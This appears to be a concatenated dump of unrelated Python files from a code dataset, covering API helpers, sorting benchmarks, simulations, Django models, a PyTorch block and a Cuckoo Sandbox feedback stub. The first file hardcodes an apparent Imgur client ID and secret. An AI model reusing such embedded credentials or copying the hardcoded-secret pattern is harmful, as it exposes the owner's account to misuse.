imgurpython import ImgurClient\n\nclient_id = '8556f6df75eac4b'\nclient_secret = '928e713a1e23dfaaaea3bd60aefdde0950f023dc'\n\nclient = ImgurClient(client_id, client_secret)\n\ndef get_imgur_data(img_id):\n data = client.get_image(img_id)\n return data.width, data.height, data.mp4, img_id\n\n#get_imgur_data('NGVCfd0')\n","sub_path":"earth/imgur_api.py","file_name":"imgur_api.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630655697","text":"# use timeit to measure duration of different\n# sorting functions with varied input lengths\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .algs import quicksort, bubblesort\n\ndef time_alg(a):\n times = []\n # range of lengths to test is 100, 200, ... 1000\n for n in range(100,1100,100):\n # create a set of 100 random vectors of that size\n x = [ np.random.randint(100,size=n) ]*100\n t0 = time.time()\n sorted = [ a(e) for e in x ]\n t1 = time.time()\n print(\"100 vectors of length %s: %s sec\" % (n, t1-t0))\n times.append(t1-t0)\n return times\n\ndef time_test():\n print(\"** Timing test for Bubblesort and Quicksort **\")\n print(\"- BUBBLESORT -\")\n bt = time_alg(bubblesort)\n print(\"\")\n print(\"- QUICKSORT -\")\n qt = time_alg(quicksort)\n print(\"\")\n print(\"** end **\")\n return bt,qt\n\ndef time_graphs(bt,qt):\n x = [ n for n in range(100,1100,100)]\n x2 = [ n for n in range(100,1001,1)]\n n2 = [ (n**2)/40000 for n in x2 ]\n nlogn = [ (n*np.log2(n))/2000 for n in x2 ]\n\n ## make graphs, save to png\n fig3,ax3 = plt.subplots(figsize=(9,6))\n ax3.scatter(x,bt,label='bubblesort')\n ax3.scatter(x,qt,marker=\"s\",label='quicksort')\n ax3.plot(x2,nlogn,color=\"black\",label=\"C*NlogN\")\n ax3.plot(x2,n2,color=\"black\",linestyle=\"--\",label=\"C*N^2\")\n ax3.set_xlabel(\"Length N of Input Vector\")\n ax3.set_ylabel(\"Time to Sort 100 Vectors (seconds)\")\n ax3.set_title('Timing Comparison, Linear Scale')\n ax3.legend()\n plt.savefig(\"fig3.png\",bbox_inches=\"tight\")\n\n fig4,ax4 = plt.subplots(figsize=(9,6))\n ax4.set_yscale('log')\n ax4.scatter(x,bt,label='bubblesort')\n ax4.scatter(x,qt,label='quicksort')\n ax4.plot(x2,nlogn,color=\"gray\",label='C*NlogN')\n ax4.plot(x2,n2,color=\"gray\",linestyle=\"--\",label='C*N^2')\n ax4.set_xlabel(\"Length N of Input Vector\")\n ax4.set_ylabel(\"Time to Sort 100 Vectors (seconds)\")\n ax4.set_title('Timing Comparison, Log Scale')\n ax4.legend()\n plt.savefig(\"fig4.png\",bbox_inches=\"tight\")\n","sub_path":"hw1/hw1/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501237073","text":"def findWaitingTime(processes, n, bt, wt):\n\n wt[0] = 0\n for i in range(1, n):\n wt[i] = bt[i - 1] + wt[i - 1]\n\n\ndef findavgTime(processes, n, bt):\n wt = [0] * n\n total_wt = 0\n\n findWaitingTime(processes, n, bt, wt)\n\n print(\"Processes Burst time \" + \" Waiting time \")\n\n for i in range(n):\n total_wt = total_wt + wt[i]\n print(\" \" + str(i + 1) + \"\\t\\t\\t\" +\n str(bt[i]) + \"\\t\\t\\t \" +\n str(wt[i]))\n\n print(\" Total waiting time = \" + str(total_wt))\n print(\"Average waiting time = \" + str(total_wt / n))\n\n\nif __name__ == \"__main__\":\n processes = [1, 2, 3]\n n = len(processes)\n\n burst_time = [15, 9, 11]\n findavgTime(processes, n, burst_time)","sub_path":"DataStruct/SJF.py","file_name":"SJF.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169322969","text":"# Dice simulation\nfrom pygal import Bar\nfrom die import Die\n\ndef main():\n # Set the dice up\n numSides = 20\n die1 = Die(numSides)\n die2 = Die(numSides)\n\n numRolls = 100000\n\n # Roll the die numRoll times and store the sum of the two.\n results = []\n\n for roll in range(numRolls):\n result = die1.roll() + die2.roll()\n results.append(result)\n\n # Anaylizing the results from above.\n frequencies = []\n\n maxResult = die1.numSides + die2.numSides\n for value in range(2, maxResult+1):\n frequency = results.count(value)\n frequencies.append(frequency)\n\n # Create a graph from the results.\n graph = Bar()\n\n graph.title = f'Results of rolling two D{numSides} die {numRolls} times.'\n\n # Create the x labels\n graph.x_labels = []\n for x in range(2, maxResult+1):\n graph.x_labels.append(f'{x}')\n\n # Add axii titles.\n graph.x_title = 'Result'\n graph.y_title = 'Frequency of Result'\n\n graph.add(f'D{numSides} + D{numSides}', frequencies) # Add teh frequencies to the graph\n\n # Create the visual file.\n graph.render_to_file(f'd{numSides}_dice_simulation.svg')\n\nif __name__ == '__main__':\n main()","sub_path":"DiceSimulation/AdvPy_2021_DiceRollSimulation_main.py","file_name":"AdvPy_2021_DiceRollSimulation_main.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258258665","text":"from datetime import datetime\nimport pyexcel_io\n\nclass Manifest:\n def __init__(self, file_name):\n self.file_name = file_name\n self.time_created = datetime.now().time()\n self.date_created = datetime.now().date()\n self.all_entries = []\n\n def index_entry(self, index, file_name, base_dir, folder_struct):\n entry = [index, file_name, base_dir, folder_struct]\n self.all_entries.append(entry)\n\n def write_to_csv(self):\n # sheet = pyexcel.Sheet(self.all_entries)\n pyexcel_io.save_data(self.file_name, self.all_entries)\n\n def read_index(self, index_requested):\n if index_requested < 1:\n return []\n index_data = pyexcel_io.get_data(self.file_name)\n for current_index in index_data:\n if current_index[0] == str(index_requested):\n return current_index\n else:\n return []\n\n def return_all_data(self):\n index_data = pyexcel_io.get_data(self.file_name)\n return index_data\n\nclass Settings:\n def __init__(self):\n pass\n\ndef main():\n print(\"Testing Manifest Class...\")\n old_manifest = Manifest(\"manifest.csv\")\n old_manifest.index_entry(1, \"boop\", \"G:\\\\\", \"folder_name\")\n old_manifest.index_entry(2, \"bap\", \"G:\\\\\", \"folder_name2\")\n old_manifest.write_to_csv()\n print(old_manifest.read_index(1))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61975944","text":"#Santiago Landaverde\r\n#1856681\r\n\r\nfrom datetime import date\r\n\r\ndef find_age(currentDate, birthDate):\r\n today = currentDate\r\n age = today.year - birthDate.year - ((today.month, today.day) < (birthDate.month, birthDate.day))\r\n return age\r\n\r\nprint(\"Birthday Calculator\")\r\nprint('Current Day')\r\n\r\nmonth = int(input('Month: '))\r\nday = int(input('Day: '))\r\nyear = int(input('Year: '))\r\n\r\nprint('Birthday')\r\n\r\nbirthday_month = int(input('Month: '))\r\nbirthday = int(input('Day: '))\r\nbirth_year = int(input('Year: '))\r\n\r\nprint(\"You are \", find_age(date(year, month, day), date(birth_year, birthday_month, birthday)), \"years old\")\r\nif day == birthday and month == birthday_month:\r\n print(\"Happy Birthday!\")","sub_path":"Homework_1/Coding_Problem_1.py","file_name":"Coding_Problem_1.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353928777","text":"# File I/O (Input/Output)\n\nservices = {'ftp':21,'ssh':22,'smtp':25,'http':80}\n\nfp = open(\"./data/services.txt\", \"w+\")\n\n# write dict to file format : \n\nfor i in services:\n a = i + \": \" + str(services[i])\n fp.write(a)\n fp.write('\\n')\nfp.close()\n\n","sub_path":"0basics/firstTools/zipcracker/stream1/file_interaction.py","file_name":"file_interaction.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"372126990","text":"from bokeh.io import curdoc\nfrom pipeline_pyrenemofs import quantities, EXPLORE_URL\nimport panel as pn\n\nAIIDA_LOGO_PATH = \"detail_pyrenemofs/static/aiida-128.png\"\n\n\ndef get_mat_id():\n \"\"\"Get the material ID from URL parameter 'mat_id', or return one for testing.\"\"\"\n try:\n name = curdoc().session_context.request.arguments.get('mat_id')[0]\n if isinstance(name, bytes):\n mat_id = name.decode()\n except (TypeError, KeyError, AttributeError):\n mat_id = 'BOLZIN'\n\n return mat_id\n\n\ndef get_details_title(mat_node):\n \"\"\"Get title for the Detail page.\"\"\"\n title = \"# Detail section for {} ({} {}) v{}\".format(mat_node.extras['name_conventional'],\n mat_node.extras['class_material'].upper(), mat_node.label,\n mat_node.extras['workflow_version'])\n return title\n\n\ndef get_geom_table(zeopp):\n \"\"\"Make a table of geometric properties, given the Zeopp output.\n\n Note: for volumetric properties I use gravimetric/Dens because in some workflow version zeopp was not parsing them.\n \"\"\"\n # Usefull: ⁻¹²³⁴⁵⁶⁷⁸⁹⁰Å\n\n decimals = 2\n\n md_str = \"\"\"\n |||| \n |---|---|---|\n | Density | {} g/cm³ | |\n | Access. Surface Area | {} m²/g | {} m²/cm³ |\n | Non-Access. Surface Area | {} m²/g | {} m²/cm³ |\n | Access. Geom. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Access. Occup. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Non-Access. Occup. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Largest Free Sphere | {} Å | |\n | Largest Included Sphere | {} Å | |\n\n \"\"\".format(\n round(zeopp[\"Density\"], decimals),\n round(zeopp[\"ASA_m^2/g\"], decimals),\n round(zeopp[\"ASA_m^2/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"NASA_m^2/g\"], decimals),\n round(zeopp[\"NASA_m^2/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"AV_cm^3/g\"], decimals), # Remember: NAV geometric is meaningless!\n round(zeopp[\"AV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"POAV_cm^3/g\"], decimals),\n round(zeopp[\"POAV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"PONAV_cm^3/g\"], decimals),\n round(zeopp[\"PONAV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"Largest_free_sphere\"], decimals),\n round(zeopp[\"Largest_included_sphere\"], decimals),\n )\n return md_str\n\n\ndef get_provenance_url(uuid):\n \"\"\"Return URL to EXPLORE section for given uuid.\"\"\"\n return '{explore_url}/details/{uuid}'.format(explore_url=EXPLORE_URL, uuid=uuid)\n\n\ndef get_provenance_link(uuid, label=None):\n \"\"\"Return pn.HTML representation of provenance link.\"\"\"\n\n if label is None:\n label = \"Browse provenance\\n\" + uuid\n\n html_str = \"\"\\\n .format(link=get_provenance_url(uuid), label=label, logo_url=AIIDA_LOGO_PATH)\n\n return html_str\n\n\ndef get_title(text, uuid=None):\n \"\"\"Return pn.Row representation of title.\n\n Includes provenance link, if uuid is specified.\n \"\"\"\n if uuid is not None:\n text += get_provenance_link(uuid)\n title = pn.Row(pn.pane.HTML('

    {}

    '.format(text)), align='start')\n\n return title\n","sub_path":"detail_pyrenemofs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548497857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 1 16:24:02 2020\n\n@author: QuYue\n\"\"\"\n\n# -*- encoding: utf-8 -*-\n'''\n@Time :2020/09/01 13:29:42\n@Author :Qu Yue\n@File :get_result.py\n@Software :Visual Studio Code\nIntroduction: \n'''\n\n#%%\nimport record\nimport numpy as np\nimport matplotlib.pyplot as plt\n#%%\nfile_name = ['./result/e9_1-2020-09-01_13-15-34.pkl',\n './result/e9_1-2020-09-01_14-06-50.pkl',\n './result/e9_1-2020-09-01_14-27-14.pkl',\n './result/e9_1-2020-09-01_14-50-11.pkl',\n './result/e9_1-2020-09-01_15-13-06.pkl']\n\n#%%\nclass PARM:\n def __init__(self):\n self.dataset_ID = 1\n \ndef mean_std(vector, dim=None):\n vector = np.array(vector)\n if dim == None:\n m = vector.mean()\n n = vector.std()\n else:\n m = vector.mean(dim)\n n = vector.std(dim)\n return m, n\n \n\n\nnum = len(file_name)\nParm = []\n#%%\nfor name in file_name:\n Parm.append(record.read(name))\n \n#%%\n#for parm in Parm:\n# print(parm.random_seed)\n \n#%%\nlength = len(Parm[0].result['SoloNet'])\nAcc = np.empty([length, num])\nTotal = np.empty([length, num])\nfor i in range(num):\n parm = Parm[i]\n for j in range(length):\n Acc[j, i] = parm.result['SoloNet'][j]['Acc']\n Total[j, i] = parm.result['SoloNet'][j]['TotalAcc']\n\nprint(f\"SoloNetAcc: {mean_std(Acc, 1)}\")\nprint(f\"SoloNetTotal: {mean_std(Total, 1)}\")\n\n# %%\nOrigin = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n Origin[i] = max(parm.result['Origin']['origin'])\n\nprint(f\"Origin: {mean_std(Origin)}\")\n\n#%%\nFusionFineTune = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionFineTune[i] = max(parm.result['FusionNet']['FusionFineTune'])\n\nprint(f\"FusionFineTune: {mean_std(FusionFineTune)}\")\n\n# %%\nFusionKD = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionKD[i] = max(parm.result['FusionNet']['FusionKD'])\n\nprint(f\"FusionKD: {mean_std(FusionKD)}\")\n\n#%%\nFusionMLKD = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionMLKD[i] = max(parm.result['FusionNet']['FusionMLKD'])\n\nprint(f\"FusionMLKD: {mean_std(FusionMLKD)}\")\n\n#%%\nFusionMLKD2 = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionMLKD2[i] = max(parm.result['FusionNet']['FusionMLKD2'])\n\nprint(f\"FusionMLKD2: {mean_std(FusionMLKD2)}\")\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Experiments/Experiments8_paper/get_result9.py","file_name":"get_result9.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385551586","text":"from django.db import models\n\n# Create your models here.\n\nclass Employees(models.Model):\n user = models.CharField('Сотрудник:', max_length=300)\n email = models.EmailField('Email сотрудника:', default=None,blank=True, null=True)\n is_active_status = models.BooleanField('Активен',default=True,)\n\n def __str__(self):\n return '%s' % self.user\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Equipment(models.Model):\n inventory_number = models.IntegerField('Инвентарный номер:')\n user = models.ForeignKey('Employees', blank=True, null=True, default=\"Склад\")\n name = models.TextField('Оборудование:',max_length=300)\n type = models.ForeignKey('Type', blank=True, null=True,)\n is_active = models.BooleanField('Активен:',default=True,)\n is_license = models.BooleanField('Лицензия', default=True)\n list_software = models.CharField('Список ПО', blank=True, null=True,max_length=500)\n\n def __str__(self):\n return '%s' % self.name\n\n class Meta:\n verbose_name = 'Оборудование'\n verbose_name_plural = 'Обрудование'\n\nclass Type(models.Model):\n type = models.CharField('Тип', max_length=255)\n\n def __str__(self):\n return '%s' % self.type\n\n class Meta:\n verbose_name = 'Тип оборудования'\n verbose_name_plural = 'Типы оборудования'\n\n\n\n\n","sub_path":"Inventory/inventory_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592015842","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Zombie(Sprite):\n \"\"\"A class to represent a single zombie in the fleet.\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"Initialize the zombie and set its starting position.\"\"\"\n super().__init__()\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n\n #load the zombie image and set its recct attribute\n self.image = pygame.image.load('images/zombie.bmp')\n self.rect = self.image.get_rect()\n\n #Start each new zombie near the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n #Store the zombie's exact horizontal position\n self.x = float(self.rect.x)\n\n def check_edges(self):\n \"\"\"Return True if zombie is at edge of screen.\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right or self.rect.left <=0:\n return True\n\n def update(self):\n \"\"\"Move the zombie right of left\"\"\"\n self.x += (self.settings.zombie_speed * self.settings.fleet_direction)\n self.rect.x = self.x\n ","sub_path":"Zominion-main/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490210854","text":"#hırsıza çalacak eşya seçimi\nclass Item(object):\n def __init__(self,n,v,w,v_w):\n self.name=n\n self.value=v\n self.weight=w\n self.v_w=v_w\n def __repr__(self):\n return \"Adı: %s Değeri: %d Ağırlığı: %d\"%(self.name,self.value,self.weight)\ndef get_items():\n items=[]\n items.append(Item('Clock',175,10,17.5))\n items.append(Item('Painting',90,9,10))\n items.append(Item('Radio',20,4,5))\n items.append(Item('Vase',50,2,25))\n items.append(Item('Book',10,1,1))\n items.append(Item('Computer',200,20,10))\n return items\n\ndef print_items(items):\n for item in items:\n print(item.name,item.value)\n\ndef sort_items(items):\n return sorted(items,key=lambda Item:Item.value,reverse=True)\n\ndef test():\n items=get_items()\n print_items(items)\n print(\"Sorted Items\")\n items=sort_items(items)\n print_items(items)\n\ndef hırsızList(items,maxWeight):\n result=[]\n totalValue,totalWeight=0,0\n for i in range(len(items)):\n if(totalWeight+items[i].weight<=maxWeight):\n result.append(items[i])\n totalWeight=totalWeight+items[i].weight\n totalValue=totalValue+items[i].value\n return (result,totalValue)\n\ndef print_result(items2):\n for item in items2[0]:\n print(item.name)\n print(items2[1])\ntest()\nItem1=get_items()\nItem2=hırsızList(Item1,20)\nprint_result(Item2)\n","sub_path":"6.Hafta-1.Ders.py","file_name":"6.Hafta-1.Ders.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238159909","text":"import sys, os, time\nfrom datetime import datetime\nfrom pathlib import Path\nfrom model.sort import sortMethodsSet\nfrom utils.csv import readFile, writeFile\nfrom model.register import Register\n\n# Pseudo-codigo\n# procedure main(args)\n# sort ← selectAlgorithm(args)\n# inputName ← parseInputFileName(args)\n# outputName ← parseOutputFileName(args)\n# A ← readCsv(inputName)\n# initTime ← getCpuTime\n# sort(A)\n# finishTime ← getCpuTime\n# writeCsv(A, outputName)\n# reportTime(A, initTime, finishTime)\n# end procedure\n\nalgorithms = sortMethodsSet # conjunto de funções, importado do módulo \"sort.py\"\n\ndef getTime():\n return time.time() * 1000\n#\n\n\"\"\"\nLer o .csv e devolver uma lista com os Registros\n\"\"\"\ndef getRegisters(path):\n listCSV = readFile(path, True)\n registers = []\n for line in listCSV: \n newRegister = Register(line[0], line[1], line[2], line[3], line[4], line[5])\n registers.append(newRegister)\n #\n return registers\n#\n\ndef getFiles(path):\n p = Path(path)\n files = os.listdir(p)\n return files\n#\n\n\"\"\"\nRegistra um resultado nos logs\n\"\"\"\ndef updateLog(algorithm, n, time):\n writeFile(\"results.csv\", [str(datetime.now()), algorithm, str(n), str(time)])\n # print(algorithm, str(n)+\" registros\", str(time)+\"ms\")\n#\n\n\"\"\"\nFunção de comparação que vamos passar nos métodos de ordenação\n\"\"\"\ndef compareByUid(a, b):\n if a.uid > b.uid: # se a > b retorna 1\n return 1\n elif a.uid == b.uid: # se for igual, retorna 0\n return 0\n else: # se a < b, retorna -1\n return -1\n #\n#\n\n\"\"\" Executa UM teste, para UM algoritmo, com UM conjunto de arquivos \"\"\"\ndef runTest(sort, file):\n registers = getRegisters(file)\n start = getTime()\n sort(registers, compareByUid)\n end = getTime()\n return registers, start, end\n#\n\ndef main(args):\n # registers = getRegisters(\"data/data_10e0.csv\")\n # registers = [10, 56, 2, 34, 12, 9, 3, 43, 11, 6]\n # registers = [10, 56, 2, 34, 12, 9, 3, 43, 11, 6]\n \n if args[\"algIdentifier\"] in algorithms.keys():\n print(\"Running\", args[\"algIdentifier\"])\n sort = algorithms[args[\"algIdentifier\"]]\n registers, startTime, endTime = runTest(sort, args[\"inputFile\"])\n updateLog(args[\"algIdentifier\"], len(registers), endTime-startTime)\n \n for reg in registers:\n print(str(reg.uid))\n #\n #\n\n if args[\"algIdentifier\"] == \"all\":\n for alg in algorithms.keys():\n sort = algorithms[alg]\n for fileName in getFiles(args[\"directory\"]):\n for i in range(0, 5):\n print(\"Running\", alg, fileName)\n registers, startTime, endTime = runTest(sort, args[\"directory\"]+\"/\"+fileName)\n updateLog(alg, len(registers), endTime-startTime)\n #\n #\n #\n #\n \n return\n#\n\nif __name__ == \"__main__\":\n # Default values\n args = {}\n\n # Update args with user input\n lenArgs = len(sys.argv)\n \n if lenArgs >= 2:\n args[\"algIdentifier\"] = str(sys.argv[1]) # pega o primeiro parâmetro passado no terminal. Ex: python main.py insertsort\n #\n\n if \"-d\" in sys.argv:\n dirIndex = sys.argv.index(\"-d\") + 1\n args[\"directory\"] = str(sys.argv[dirIndex])\n else:\n args[\"directory\"] = \"data\"\n #\n\n if \"-i\" in sys.argv:\n fileIndex = sys.argv.index(\"-i\") + 1\n args[\"inputFile\"] = str(sys.argv[fileIndex])\n #\n \n main(args)\n#\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69331975","text":"#! /usr/bin/env python\n\nimport json\nimport sys\nfrom collections import Counter\nfrom jinja2 import *\n\n# Load 101wiki into memory\n\nwiki = json.loads(open(sys.argv[1], 'r').read())['wiki']\n#wiki = json.loads(open('wiki.json', 'r').read())['wiki']\n\n\n# Write .json and .html file -- the latter as a tag cloud\ndef writeFiles(counts, label, prefix):\n\n # Write frequency map to JSON\n jsonFile = open(label + '.json', 'w')\n jsonFile.write(json.dumps(counts, indent=4))\n\n # Prepare for buckets of scaling\n # Inspired by http://stackoverflow.com/questions/3180779/html-tag-cloud-in-python\n #step = max(counts.values()) / 6\n\n #counts = sorted(counts.items(), key=lambda x: x[1], reverse=True)\n \n #loader = FileSystemLoader('.')\n #env = Environment(loader=loader)\n #template = env.get_template('tagcloud.json')\n #open(label + '.json', 'w').write(template.render({\n # 'title': label,\n # 'counts': counts,\n # 'step': step,\n # 'root': 'http://101companies.org/wiki/' + prefix\n #}))\n \n ## Apply scaling and write HTML\n #htmlFile = open(label + '.html', 'w')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.write(' ' + label + '\\n')\n #htmlFile.write(' \\n')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n\n #print counts\n\n \n #for tag, count in counts:\n # css = count / step \n # htmlFile.write('%s\\n' % (root, tag, css, tag),)\n\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.close()\n\npages = wiki['pages']\n\ncontributions = filter(lambda p: \"Contribution\" == p.get('p', ''), pages)\n#contributions = [p['page'] for p in contributions ]\n\nuses = [p.get('uses', []) for p in contributions]\nuses = [p for use in uses for p in use]\n\nuses = filter(lambda u: u['p'] == 'Language', uses)\n\nuses = [use['n'].replace('_', ' ') for use in uses]\n\nlcounts = Counter(uses)\n\nuses = [p.get('uses', []) for p in contributions]\nuses = [p for use in uses for p in use]\n\nuses = filter(lambda u: u['p'] == 'Technology', uses)\n\nuses = [use['n'].replace('_', ' ') for use in uses]\n\ntcounts = dict(Counter(uses))\n\n# features\n\nimplements = map(lambda c: c.get('implements', []), contributions)\nimplements = reduce(lambda a, b: a+b, implements)\n\nfeatures = filter(lambda o: o['p'] == 'Feature', implements)\nfeatures = map(lambda o: o['n'], features)\n\nfeatures = [f.replace('_', ' ') for f in features]\n\nfcounts = dict(Counter(features))\n\n#contributors\n\ndevelopedBy = map(lambda c: c.get('developedBy', []), contributions)\ndevelopedBy = reduce(lambda a, b: a+b, developedBy)\n\ndevelopedBy = filter(lambda o: o['p'] == 'Contributor', developedBy)\ndevelopedBy = map(lambda o: o['n'], developedBy)\n\ndevelopedBy = filter(lambda n: n is not None, developedBy)\n\ndevelopedBy = [d.replace('_', ' ') for d in developedBy]\n#developedBy = [ d.decode('utf8') for d in developedBy]\n\nccounts = dict(Counter(developedBy))\n\nwriteFiles(lcounts, 'languages', 'Language')\nwriteFiles(tcounts, 'technologies', 'Technology')\nwriteFiles(fcounts, 'features', 'Feature')\nwriteFiles(ccounts, 'contributors', 'Contributors')\n","sub_path":"101worker/modules/moretagclouds/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242312010","text":"import csv\nimport emoji\nfrom joblib import Parallel, delayed\nimport multiprocessing\n\n\ndef removeEmoji(line):\n item = line\n for key in emoji.UNICODE_EMOJI:\n item = item.replace(key,emoji.UNICODE_EMOJI[key].replace(':',\" \"))\n return item\n\ntext = open(\"twcs.csv\", \"r\")\n\nx = open(\"output.csv\",\"w\")\nnum_cores = multiprocessing.cpu_count()\n\nresults = Parallel(n_jobs=num_cores)(delayed(removeEmoji)(i) for i in text)\n\n\nx.writelines(results)\n\nx.close()\n\n\n\n\n","sub_path":"scripts/EmojiTranslate.py","file_name":"EmojiTranslate.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495487574","text":"\"\"\"\n# Copyright (c) 2019 Wang Hanqin\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\nimport torch.nn as nn\nfrom .utils import standardize\n\nclass Conv_Block(nn.Module):\n def __init__(self, input, filters, kernel_sizes, stride, padding, groups=1, name='', dilation=1,\n bias=True, activation=nn.ReLU(), batch_norm=None, dropout=0, transpose=False):\n super().__init__()\n self.layers = conv_block(input, filters, kernel_sizes, stride, padding, groups, name, dilation,\n bias, activation, batch_norm, dropout, transpose)\n\n def forward(self, x):\n return self.layers.forward(x)\n \n\ndef conv_block(input, filters, kernel_sizes, stride, padding, groups=1, name='', dilation=1,\n bias=True, activation=nn.ReLU(), batch_norm=None, dropout=0, transpose=False):\n \"\"\"\n Create a convolutional block with several layers\n :param input: input data channels\n :param filters: int or list\n :param kernel_sizes: int or list\n :param stride: int or list\n :param padding: int or list\n :param groups: int or list, default 1\n :param name:\n :param activation:\n :param batch_norm:\n :return: nn.Sequential Object\n \"\"\"\n filters = [input] + [filters] if type(filters) is not list else [input] + filters\n assert_length = len(filters) - 1\n kernel_sizes = standardize(kernel_sizes, assert_length)\n stride = standardize(stride, assert_length)\n padding = standardize(padding, assert_length)\n groups = standardize(groups, assert_length)\n dilation = standardize(dilation, assert_length)\n bias = standardize(bias, assert_length)\n activation = standardize(activation, assert_length)\n batch_norm = standardize(batch_norm, assert_length)\n dropout = standardize(dropout, assert_length)\n transpose = standardize(transpose, assert_length)\n\n modules = nn.Sequential()\n for i in range(len(filters) - 1):\n if transpose[i]:\n modules.add_module(\"convT_\" + name + \"_\" + str(i),\n nn.ConvTranspose2d(in_channels=filters[i], out_channels=filters[i + 1],\n kernel_size=kernel_sizes[i], stride=stride[i], padding=padding[i],\n dilation=dilation[i], groups=groups[i], bias=bias[i]))\n else:\n modules.add_module(\"conv_\" + name + \"_\" + str(i),\n nn.Conv2d(in_channels=filters[i], out_channels=filters[i + 1],\n kernel_size=kernel_sizes[i], stride=stride[i], padding=padding[i],\n dilation=dilation[i], groups=groups[i], bias=bias[i]))\n\n if batch_norm[i]:\n modules.add_module(\"bn_\" + name + \"_\" + str(i), batch_norm[i](filters[i + 1]))\n if activation[i]:\n modules.add_module(\"act_\" + name + \"_\" + str(i), activation[i])\n if dropout[i] > 0:\n modules.add_module(\"drop_\" + name + \"_\" + str(i), nn.Dropout2d(dropout[i]))\n return modules","sub_path":"networks/blocks/conv_block.py","file_name":"conv_block.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248240162","text":"# Copyright (C) 2016 Cuckoo Foundation.\n# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org\n# See the file 'docs/LICENSE' for copying permission.\n\nimport base64\nimport json\nimport logging\nimport os\nimport requests\nimport traceback\n\nfrom cuckoo.misc import cwd\nfrom django.core.validators import validate_email, ValidationError\nfrom django.template import TemplateSyntaxError, TemplateDoesNotExist\nfrom django.conf import settings\nfrom django.http import Http404\n\nfrom cuckoo.core.report import AbstractReport\nfrom cuckoo.common.config import Config, config\nfrom cuckoo.misc import version\nfrom cuckoo.web.controllers.analysis.export.export import ExportController\n\nfrom cuckoo.common.exceptions import CuckooFeedbackError\n\nlog = logging.getLogger(__name__)\n\nclass CuckooFeedback(object):\n \"\"\"Contacts Cuckoo HQ with feedback + optional analysis dump\"\"\"\n\n def __init__(self):\n self.endpoint = \"https://cuckoo.sh/feedback/api/submit/\"\n self.mongo = 